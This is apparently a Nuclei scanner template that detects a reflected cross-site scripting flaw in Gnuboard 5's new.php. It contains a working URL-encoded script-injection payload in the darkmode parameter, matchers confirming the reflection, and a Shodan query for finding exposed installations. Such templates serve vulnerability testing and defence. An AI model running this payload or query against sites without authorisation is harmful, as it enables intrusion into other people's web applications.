id: gnuboard5-xss

info:
  name: Gnuboard 5 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    Gnuboard 5 contains a cross-site scripting vulnerability via the clean_xss_tags() function called in new.php.
  reference:
    - https://huntr.dev/bounties/ad2a9b32-fe6c-43e9-9b05-2c77c58dde6a/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
    shodan-query: http.html:"gnuboard5"
  tags: xss,gnuboard,gnuboard5,huntr

requests:
  - method: GET
    path:
      - "{{BaseURL}}/bbs/new.php?darkmode=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'header\"><script>alert(document.domain)</script>.css?'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by md on 2022/09/19
